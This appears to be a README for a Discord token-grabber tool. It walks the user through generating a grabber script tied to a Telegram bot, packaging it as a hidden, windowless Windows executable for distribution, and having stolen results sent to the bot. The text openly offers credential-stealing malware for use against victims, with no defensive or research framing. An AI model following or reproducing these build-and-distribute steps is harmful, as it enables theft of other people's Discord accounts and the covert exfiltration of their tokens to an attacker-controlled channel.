- Run
start.bat: Double-click thestart.batfile to begin the setup process. - Paste your Bot Token: Get your bot token from @BotFather on Telegram and paste it when prompted.
- Paste your User ID: Obtain your numeric user ID from @userinfobot on Telegram and paste it when requested.
- Enter Grabber File Name: Type the desired name for your generated grabber script (e.g.,
grabber.py). - Grabber File Created Successfully: The grabber file will be generated and saved in your DiscordTokenGrabber directory.
You can convert the Python script into a standalone executable (.exe) file for easier distribution on Windows.
-
Install PyInstaller: Open
cmdor PowerShell and run:pip install pyinstaller
-
Generate the Executable: Navigate to the directory where
main.pyis saved, then run:pyinstaller --onefile --noconsole main.py
--onefile: Packages everything into a single.exefile.--noconsole: Prevents a console window from opening when the.exeis run.
-
Find the Executable: The generated
.exefile (main.exeby default) will be located in thedistfolder within your script's directory.
- All results sended to bot tel
- Full Fast
